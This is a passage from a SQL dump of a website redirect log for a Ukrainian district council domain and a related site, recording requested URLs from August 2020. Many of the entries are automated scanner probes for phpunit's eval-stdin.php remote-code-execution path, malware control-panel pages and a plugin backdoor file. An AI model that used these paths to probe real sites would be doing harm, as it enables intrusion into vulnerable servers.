00:00:00',301),(35875,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/tasks.php',NULL,'','',2,0,'2020-08-21 09:44:17','0000-00-00 00:00:00',301),(35876,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/stats.php',NULL,'','',1,0,'2020-08-21 09:44:17','0000-00-00 00:00:00',301),(35877,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/run.php',NULL,'','',1,0,'2020-08-21 09:44:18','0000-00-00 00:00:00',301),(35878,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/asdfddsas.php',NULL,'','',1,0,'2020-08-21 09:44:19','0000-00-00 00:00:00',301),(35879,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/tmp',NULL,'','',1,0,'2020-08-21 09:44:27','0000-00-00 00:00:00',301),(35880,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/tmp/',NULL,'','',1,0,'2020-08-21 09:44:28','0000-00-00 00:00:00',301),(35881,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/vendor',NULL,'','',1,0,'2020-08-21 09:44:28','0000-00-00 00:00:00',301),(35882,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/vendor/',NULL,'','',1,0,'2020-08-21 09:44:29','0000-00-00 00:00:00',301),(35883,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/lib',NULL,'','',1,0,'2020-08-21 09:44:30','0000-00-00 00:00:00',301),(35884,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/lib/',NULL,'','',1,0,'2020-08-21 09:44:30','0000-00-00 00:00:00',301),(35885,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/app',NULL,'','',1,0,'2020-08-21 09:44:31','0000-00-00 00:00:00',301),(35886,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/app/',NULL,'','',1,0,'2020-08-21 09:44:32','0000-00-00 00:00:00',301),(35887,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/tmp/logs',NULL,'','',1,0,'2020-08-21 09:44:32','0000-00-00 00:00:00',301),(35888,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/tmp/logs/',NULL,'','',1,0,'2020-08-21 09:44:33','0000-00-00 00:00:00',301),(35889,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/uploads',NULL,'','',1,0,'2020-08-21 09:44:34','0000-00-00 00:00:00',301),(35890,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/uploads/',NULL,'','',1,0,'2020-08-21 09:44:34','0000-00-00 00:00:00',301),(35891,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/public',NULL,'','',1,0,'2020-08-21 09:44:35','0000-00-00 00:00:00',301),(35892,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/public/',NULL,'','',1,0,'2020-08-21 09:44:35','0000-00-00 00:00:00',301),(35893,'https://www.malyn-rayrada.gov.ua/theme/menu.html',NULL,'','',1,0,'2020-08-21 09:44:36','0000-00-00 00:00:00',301),(35894,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/img/logo.png',NULL,'','',1,0,'2020-08-21 09:44:48','0000-00-00 00:00:00',301),(35895,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/classes/auth.php',NULL,'','',1,0,'2020-08-21 09:45:00','0000-00-00 00:00:00',301),(35896,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/classes/clients.php',NULL,'','',1,0,'2020-08-21 09:45:00','0000-00-00 00:00:00',301),(35897,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/classes/not_exists.php',NULL,'','',1,0,'2020-08-21 09:45:01','0000-00-00 00:00:00',301),(35898,'https://www.malyn-rayrada.gov.ua/drops',NULL,'','',1,0,'2020-08-21 09:45:45','0000-00-00 00:00:00',301),(35899,'https://www.malyn-rayrada.gov.ua/bots',NULL,'','',1,0,'2020-08-21 09:45:46','0000-00-00 00:00:00',301),(35900,'https://www.malyn-rayrada.gov.ua/settings',NULL,'','',1,0,'2020-08-21 09:45:47','0000-00-00 00:00:00',301),(35901,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/indexu.php',NULL,'','',1,0,'2020-08-21 09:45:48','0000-00-00 00:00:00',301),(35902,'https://www.malyn-rayrada.gov.ua/anti_vidar/login.php',NULL,'','',1,0,'2020-08-21 09:45:50','0000-00-00 00:00:00',301),(35903,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/theme/header.html',NULL,'','',2,0,'2020-08-21 09:45:51','0000-00-00 00:00:00',301),(35904,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/cp.php',NULL,'','',1,0,'2020-08-21 09:45:52','0000-00-00 00:00:00',301),(35905,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/theme/images/back-all.jpg',NULL,'','',1,0,'2020-08-21 09:45:52','0000-00-00 00:00:00',301),(35906,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/admin',NULL,'','',1,0,'2020-08-21 09:45:53','0000-00-00 00:00:00',301),(35907,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/back.css',NULL,'','',1,0,'2020-08-21 09:45:54','0000-00-00 00:00:00',301),(35908,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/panel/login.php',NULL,'','',1,0,'2020-08-21 09:45:56','0000-00-00 00:00:00',301),(35909,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/gate.php',NULL,'','',3,0,'2020-08-21 09:45:56','0000-00-00 00:00:00',301),(35910,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/notexistentpath.php',NULL,'','',1,0,'2020-08-21 09:46:01','0000-00-00 00:00:00',301),(35911,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/home.php',NULL,'','',1,0,'2020-08-21 09:46:10','0000-00-00 00:00:00',301),(35912,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/main.php',NULL,'','',1,0,'2020-08-21 09:46:24','0000-00-00 00:00:00',301),(35913,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/submit.php',NULL,'','',1,0,'2020-08-21 09:46:24','0000-00-00 00:00:00',301),(35914,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/style.css',NULL,'','',1,0,'2020-08-21 09:46:35','0000-00-00 00:00:00',301),(35915,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/includes/design/images/favicon.ico',NULL,'','',1,0,'2020-08-21 09:46:36','0000-00-00 00:00:00',301),(35916,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/assets/img/favicon.ico',NULL,'','',1,0,'2020-08-21 09:46:41','0000-00-00 00:00:00',301),(35917,'https://www.malyn-rayrada.gov.ua/gate',NULL,'','',1,0,'2020-08-21 09:47:08','0000-00-00 00:00:00',301),(35918,'https://www.malyn-rayrada.gov.ua/gate/log.php',NULL,'','',1,0,'2020-08-21 09:47:08','0000-00-00 00:00:00',301),(35919,'https://www.malyn-rayrada.gov.ua/ca.php?m=4f5441744d6b49744d7a51744d7a55744d7a59744f44553d&h=437',NULL,'','',1,0,'2020-08-21 09:47:19','0000-00-00 00:00:00',301),(35920,'https://www.malyn-rayrada.gov.ua/post/echo',NULL,'','',1,0,'2020-08-21 09:47:24','0000-00-00 00:00:00',301),(35921,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/bins.php',NULL,'','',1,0,'2020-08-21 09:47:25','0000-00-00 00:00:00',301),(35922,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/pvqdq929bsx_a_d_m1n_a.php',NULL,'','',1,0,'2020-08-21 09:47:26','0000-00-00 00:00:00',301),(35923,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/fre.php',NULL,'','',1,0,'2020-08-21 09:47:27','0000-00-00 00:00:00',301),(35924,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/umc.php',NULL,'','',1,0,'2020-08-21 09:47:27','0000-00-00 00:00:00',301),(35925,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/link.php',NULL,'','',1,0,'2020-08-21 09:47:28','0000-00-00 00:00:00',301),(35926,'https://www.malyn-rayrada.gov.ua/path/index.php',NULL,'','',1,0,'2020-08-21 09:47:35','0000-00-00 00:00:00',301),(35927,'https://www.malyn-rayrada.gov.ua/html/reports.html',NULL,'','',1,0,'2020-08-21 09:47:37','0000-00-00 00:00:00',301),(35928,'https://www.malyn-rayrada.gov.ua/html/menu.html',NULL,'','',1,0,'2020-08-21 09:47:38','0000-00-00 00:00:00',301),(35929,'https://www.malyn-rayrada.gov.ua/functions.php',NULL,'','',1,0,'2020-08-21 09:47:40','0000-00-00 00:00:00',301),(35930,'https://www.malyn-rayrada.gov.ua/html/cookiesconverter.html',NULL,'','',1,0,'2020-08-21 09:47:48','0000-00-00 00:00:00',301),(35931,'https://www.malyn-rayrada.gov.ua/html/login.html',NULL,'','',1,0,'2020-08-21 09:47:49','0000-00-00 00:00:00',301),(35932,'https://www.malyn-rayrada.gov.ua/html/passwords.html',NULL,'','',1,0,'2020-08-21 09:47:50','0000-00-00 00:00:00',301),(35933,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/admin/resources/images/',NULL,'','',2,0,'2020-08-21 09:48:08','0000-00-00 00:00:00',301),(35934,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/admin/resources/css/',NULL,'','',2,0,'2020-08-21 09:48:09','0000-00-00 00:00:00',301),(35935,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/admin/flags/',NULL,'','',1,0,'2020-08-21 09:48:10','0000-00-00 00:00:00',301),(35936,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/o1o/a10.php',NULL,'','',1,0,'2020-08-21 09:48:14','0000-00-00 00:00:00',301),(35937,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/login',NULL,'','',1,0,'2020-08-21 09:48:19','0000-00-00 00:00:00',301),(35938,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/ping',NULL,'','',1,0,'2020-08-21 09:48:19','0000-00-00 00:00:00',301),(35939,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/dl/phpinfos.php',NULL,'','',1,0,'2020-08-21 09:48:19','0000-00-00 00:00:00',301),(35940,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/api.php',NULL,'','',1,0,'2020-08-21 09:48:21','0000-00-00 00:00:00',301),(35941,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/data/login.css',NULL,'','',1,0,'2020-08-21 09:48:22','0000-00-00 00:00:00',301),(35942,'https://www.malyn-rayrada.gov.ua/panel/login.php',NULL,'','',1,0,'2020-08-21 09:48:27','0000-00-00 00:00:00',301),(35943,'https://www.malyn-rayrada.gov.ua/index.php/login.php',NULL,'','',1,0,'2020-08-21 09:48:28','0000-00-00 00:00:00',301),(35944,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/pages/webcams.php',NULL,'','',1,0,'2020-08-21 09:48:30','0000-00-00 00:00:00',301),(35945,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/pages/passwords.php',NULL,'','',1,0,'2020-08-21 09:48:30','0000-00-00 00:00:00',301),(35946,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/js/main.js',NULL,'','',1,0,'2020-08-21 09:48:40','0000-00-00 00:00:00',301),(35947,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/img',NULL,'','',3,0,'2020-08-21 09:48:44','0000-00-00 00:00:00',301),(35948,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/img/banners',NULL,'','',2,0,'2020-08-21 09:48:44','0000-00-00 00:00:00',301),(35949,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/img/',NULL,'','',1,0,'2020-08-21 09:48:47','0000-00-00 00:00:00',301),(35950,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/includes',NULL,'','',1,0,'2020-08-21 09:48:47','0000-00-00 00:00:00',301),(35951,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/includes/',NULL,'','',1,0,'2020-08-21 09:48:48','0000-00-00 00:00:00',301),(35952,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/statistics.php',NULL,'','',1,0,'2020-08-21 09:48:48','0000-00-00 00:00:00',301),(35953,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/statistics.php/',NULL,'','',1,0,'2020-08-21 09:48:48','0000-00-00 00:00:00',301),(35954,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/includes/database.php',NULL,'','',1,0,'2020-08-21 09:48:48','0000-00-00 00:00:00',301),(35955,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/includes/database.php/',NULL,'','',1,0,'2020-08-21 09:48:49','0000-00-00 00:00:00',301),(35956,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/gate.php/',NULL,'','',1,0,'2020-08-21 09:48:49','0000-00-00 00:00:00',301),(35957,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/includes/commands.php',NULL,'','',1,0,'2020-08-21 09:48:49','0000-00-00 00:00:00',301),(35958,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/includes/commands.php/',NULL,'','',1,0,'2020-08-21 09:48:50','0000-00-00 00:00:00',301),(35959,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/css',NULL,'','',1,0,'2020-08-21 09:48:50','0000-00-00 00:00:00',301),(35960,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/css/',NULL,'','',1,0,'2020-08-21 09:48:50','0000-00-00 00:00:00',301),(35961,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/css/table_view.css',NULL,'','',1,0,'2020-08-21 09:48:50','0000-00-00 00:00:00',301),(35962,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/img/header_logo.png',NULL,'','',1,0,'2020-08-21 09:48:53','0000-00-00 00:00:00',301),(35963,'https://malyn-rayrada.gov.ua/modules/ps_facetedsearch/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',2,0,'2020-08-22 13:19:35','0000-00-00 00:00:00',301),(35964,'https://malyn-rayrada.gov.ua/blog/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',2,0,'2020-08-22 13:20:31','0000-00-00 00:00:00',301),(35965,'https://malyn-rayrada.gov.ua/system/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',2,0,'2020-08-22 13:22:38','0000-00-00 00:00:00',301),(35966,'https://malyn-rayrada.gov.ua/modules/gamification/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',2,0,'2020-08-22 13:23:24','0000-00-00 00:00:00',301),(35967,'https://malyn-rayrada.gov.ua/shop/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',2,0,'2020-08-22 13:24:56','0000-00-00 00:00:00',301),(35968,'https://malyn-rayrada.gov.ua/testing/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',2,0,'2020-08-22 13:26:17','0000-00-00 00:00:00',301),(35969,'https://malyn-rayrada.gov.ua/mahara/auth/saml/extlib/simplesamlphp/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',2,0,'2020-08-22 13:28:58','0000-00-00 00:00:00',301),(35970,'https://malyn-rayrada.gov.ua/concrete/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',2,0,'2020-08-22 13:31:07','0000-00-00 00:00:00',301),(35971,'https://malyn-rayrada.gov.ua/local/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',2,0,'2020-08-22 13:31:35','0000-00-00 00:00:00',301),(35972,'https://malyn-rayrada.gov.ua/lib/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',2,0,'2020-08-22 13:32:10','0000-00-00 00:00:00',301),(35973,'https://malyn-rayrada.gov.ua/backup/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',2,0,'2020-08-22 13:32:52','0000-00-00 00:00:00',301),(35974,'https://malyn-rayrada.gov.ua/demo/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',2,0,'2020-08-22 13:34:14','0000-00-00 00:00:00',301),(35975,'https://malyn-rayrada.gov.ua/mapa/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',2,0,'2020-08-22 13:35:06','0000-00-00 00:00:00',301),(35976,'https://malyn-rayrada.gov.ua/platform/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',2,0,'2020-08-22 13:35:54','0000-00-00 00:00:00',301),(35977,'https://malyn-rayrada.gov.ua/2018/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',2,0,'2020-08-22 13:37:58','0000-00-00 00:00:00',301),(35978,'https://malyn-rayrada.gov.ua/all/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',2,0,'2020-08-22 13:38:49','0000-00-00 00:00:00',301),(35979,'https://malyn-rayrada.gov.ua/new/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',2,0,'2020-08-22 13:39:18','0000-00-00 00:00:00',301),(35980,'https://malyn-rayrada.gov.ua/pro/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',2,0,'2020-08-22 13:40:29','0000-00-00 00:00:00',301),(35981,'https://malyn-rayrada.gov.ua/www/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',2,0,'2020-08-22 13:41:15','0000-00-00 00:00:00',301),(35982,'https://malyn-rayrada.gov.ua/2020/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',2,0,'2020-08-22 13:44:46','0000-00-00 00:00:00',301),(35983,'https://malyn-rayrada.gov.ua/2019/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',2,0,'2020-08-22 13:45:11','0000-00-00 00:00:00',301),(35984,'https://malyn-rayrada.gov.ua/beta/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',2,0,'2020-08-22 13:45:55','0000-00-00 00:00:00',301),(35985,'https://malyn-rayrada.gov.ua/portal/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',2,0,'2020-08-22 13:46:34','0000-00-00 00:00:00',301),(35986,'https://malyn-rayrada.gov.ua/pms/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',2,0,'2020-08-22 13:47:44','0000-00-00 00:00:00',301),(35987,'https://malyn-rayrada.gov.ua/id/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',2,0,'2020-08-22 13:48:34','0000-00-00 00:00:00',301),(35988,'https://malyn-rayrada.gov.ua/test/med-decision/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',2,0,'2020-08-22 13:49:14','0000-00-00 00:00:00',301),(35989,'https://malyn-rayrada.gov.ua/site/portalescolar/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',2,0,'2020-08-22 13:50:43','0000-00-00 00:00:00',301),(35990,'https://malyn-rayrada.gov.ua/dev/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',2,0,'2020-08-22 13:51:42','0000-00-00 00:00:00',301),(35991,'https://malyn-rayrada.gov.ua/protected/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',2,0,'2020-08-22 13:52:21','0000-00-00 00:00:00',301),(35992,'https://malyn-rayrada.gov.ua/en/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',2,0,'2020-08-22 13:53:04','0000-00-00 00:00:00',301),(35993,'https://malyn-rayrada.gov.ua/administration/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',2,0,'2020-08-22 13:53:11','0000-00-00 00:00:00',301),(35994,'https://malyn-rayrada.gov.ua/login/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',2,0,'2020-08-22 13:53:41','0000-00-00 00:00:00',301),(35995,'https://malyn-rayrada.gov.ua/v1/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',2,0,'2020-08-22 13:54:42','0000-00-00 00:00:00',301),(35996,'https://malyn-rayrada.gov.ua/web/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',2,0,'2020-08-22 13:56:13','0000-00-00 00:00:00',301),(35997,'https://malyn-rayrada.gov.ua/site/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',2,0,'2020-08-22 13:57:37','0000-00-00 00:00:00',301),(35998,'https://malyn-rayrada.gov.ua/assets/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',2,0,'2020-08-22 13:58:35','0000-00-00 00:00:00',301),(35999,'https://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-11122019-roku/2318-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-malinskogo-rajonu-na-2019-rik',NULL,'','',1,0,'2020-08-22 19:33:41','0000-00-00 00:00:00',301),(36000,'https://malyn-rayrada.gov.ua/community',NULL,'','',1,0,'2020-08-23 23:03:08','0000-00-00 00:00:00',301),(36001,'https://malyn-rayrada.gov.ua/wp-content/plugins/ioptimization/ioptimize.php?rchk',NULL,'www.google.com','',1,0,'2020-08-25 04:28:21','0000-00-00 00:00:00',301),(36002,'http://r.malehus.in.ua/modules/mod_zt_visitor_counter/assets/style/users.css.css',NULL,'http://r.malehus.in.ua/index.php','',251,0,'2020-08-27 08:16:00','0000-00-00 00:00:00',301),(36003,'http://r.malehus.in.ua/modules/mod_zt_visitor_counter/assets/digit/style1.css.css',NULL,'http://r.malehus.in.ua/index.php','',248,0,'2020-08-27 08:16:01','0000-00-00 00:00:00',301),(36004,'http://r.malehus.in.ua/administrator.index.php',NULL,'','',2,0,'2020-08-27 08:17:52','0000-00-00 00:00:00',301),(36005,'http://r.malehus.in.ua/administrator.php',NULL,'','',2,0,'2020-08-27 08:17:59','0000-00-00 00:00:00',301),(36006,'http://r.malehus.in.ua/favicon.ico',NULL,'http://r.malehus.in.ua/','',31,0,'2020-08-27 08:19:18','0000-00-00 00:00:00',301),(36007,'http://r.malehus.in.ua/index.php/administrator',NULL,'','',2,0,'2020-08-27 08:25:41','0000-00-00 00:00:00',301),(36008,'http://r.malehus.in.ua/index.php/administrator/index.php',NULL,'','',1,0,'2020-08-27 08:26:21','0000-00-00 00:00:00',301),(36009,'http://r.malehus.in.ua/administrator/tabaka',NULL,'','',2,0,'2020-08-27 08:52:01','0000-00-00 00:00:00',301),(36010,'http://r.malehus.in.ua/index.php/rishennja-radi',NULL,'http://r.malehus.in.ua/','',1,0,'2020-08-27 09:11:14','0000-00-00 00:00:00',301),(36011,'http://r.malehus.in.ua/administrator/images/stories/bud77.jpg',NULL,'http://r.malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit&id=415','',3,0,'2020-08-27 09:43:22','0000-00-00 00:00:00',301),(36012,'http://r.malehus.in.ua/administrator/images/stories/ivanivka77.jpg',NULL,'http://r.malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit&id=415','',2,0,'2020-08-27 09:43:22','0000-00-00 00:00:00',301),(36013,'http://r.malehus.in.ua/administrator/images/stories/luki77.jpg',NULL,'http://r.malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit&id=415','',3,0,'2020-08-27 09:43:22','0000-00-00 00:00:00',301),(36014,'http://r.malehus.in.ua/administrator/images/stories/melnik.jpg',NULL,'http://r.malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit&id=415','',3,0,'2020-08-27 09:43:23','0000-00-00 00:00:00',301),(36015,'http://r.malehus.in.ua/administrator/images/stories/korbut.jpg',NULL,'http://r.malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit&id=415','',3,0,'2020-08-27 09:43:23','0000-00-00 00:00:00',301),(36016,'http://r.malehus.in.ua/administrator/images/stories/nedashki77.jpg',NULL,'http://r.malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit&id=415','',3,0,'2020-08-27 09:43:23','0000-00-00 00:00:00',301),(36017,'http://r.malehus.in.ua/administrator/images/stories/timo_1.jpg',NULL,'http://r.malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit&id=415','',3,0,'2020-08-27 09:43:23','0000-00-00 00:00:00',301),(36018,'http://r.malehus.in.ua/administrator/images/stories/golovki.jpg',NULL,'http://r.malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit&id=415','',3,0,'2020-08-27 09:43:23','0000-00-00 00:00:00',301),(36019,'http://r.malehus.in.ua/administrator/images/stories/stroga.jpg',NULL,'http://r.malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit&id=415','',3,0,'2020-08-27 09:43:23','0000-00-00 00:00:00',301),(36020,'http://r.malehus.in.ua/administrator/images/stories/slob77.jpg',NULL,'http://r.malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit&id=415','',2,0,'2020-08-27 09:43:23','0000-00-00 00:00:00',301),(36021,'http://r.malehus.in.ua/administrator/images/stories/stvor.jpg',NULL,'http://r.malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit&id=415','',2,0,'2020-08-27 09:43:23','0000-00-00 00:00:00',301),(36022,'http://r.malehus.in.ua/administrator/images/stories/druz.jpg',NULL,'http://r.malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit&id=415','',2,0,'2020-08-27 09:43:23','0000-00-00 00:00:00',301),(36023,'http://r.malehus.in.ua/administrator/images/stories/samila_320x240.jpg',NULL,'http://r.malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit&id=415','',2,0,'2020-08-27 09:43:23','0000-00-00 00:00:00',301),(36024,'http://r.malehus.in.ua/administrator/images/stories/chop_filon.jpg',NULL,'http://r.malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit&id=415','',2,0,'2020-08-27 09:43:23','0000-00-00 00:00:00',301),(36025,'http://r.malehus.in.ua/administrator/images/stories/kursa77.jpg',NULL,'http://r.malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit&id=415','',2,0,'2020-08-27 09:43:23','0000-00-00 00:00:00',301),(36026,'http://r.malehus.in.ua/administrator/images/stories/gorin.jpg',NULL,'http://r.malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit&id=415','',3,0,'2020-08-27 09:43:23','0000-00-00 00:00:00',301),(36027,'http://r.malehus.in.ua/administrator/images/stories/vors_11.jpg',NULL,'http://r.malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit&id=415','',3,0,'2020-08-27 09:43:23','0000-00-00 00:00:00',301),(36028,'http://r.malehus.in.ua/administrator/images/stories/lakei.jpg',NULL,'http://r.malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit&id=415','',2,0,'2020-08-27 09:43:23','0000-00-00 00:00:00',301),(36029,'http://r.malehus.in.ua/administrator/images/stories/vush77.jpg',NULL,'http://r.malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit&id=415','',3,0,'2020-08-27 09:43:23','0000-00-00 00:00:00',301),(36030,'http://r.malehus.in.ua/administrator/images/stories/garachc.jpg',NULL,'http://r.malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit&id=415','',3,0,'2020-08-27 09:43:23','0000-00-00 00:00:00',301),(36031,'http://r.malehus.in.ua/templates/5656/images/page.jpeg',NULL,'http://r.malehus.in.ua/templates/5656/css/template.css','',2,0,'2020-08-27 13:01:04','0000-00-00 00:00:00',301),(36032,'http://r.malehus.in.ua/templates/rada280317/images/page.jpeg',NULL,'http://r.malehus.in.ua/templates/rada280317/css/template.css','',1,0,'2020-08-27 13:02:34','0000-00-00 00:00:00',301),(36033,'http://r.malehus.in.ua/tp',NULL,'','',1,0,'2020-08-28 15:24:22','0000-00-00 00:00:00',301),(36034,'http://r.malehus.in.ua/https://malyn-rayrada.gov.ua/images/stories/2012-12-13grochi_zoom_width_225.jpg',NULL,'http://r.malehus.in.ua/','',8,0,'2020-08-28 17:25:00','0000-00-00 00:00:00',301),(36035,'http://r.malehus.in.ua/administrator/images/stories/hor.jpg',NULL,'http://r.malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit&id=1602','',37,0,'2020-08-28 18:58:39','0000-00-00 00:00:00',301),(36036,'http://r.malehus.in.ua/index.php/kontakti',NULL,'http://r.malehus.in.ua/','',1,0,'2020-08-28 19:03:31','0000-00-00 00:00:00',301),(36037,'http://malehus.in.ua/modules/mod_zt_visitor_counter/assets/digit/style1.css.css',NULL,'http://malehus.in.ua/index.php','',4,0,'2020-08-29 12:08:48','0000-00-00 00:00:00',301),(36038,'http://malehus.in.ua/modules/mod_zt_visitor_counter/assets/style/users.css.css',NULL,'http://malehus.in.ua/index.php','',4,0,'2020-08-29 12:08:49','0000-00-00 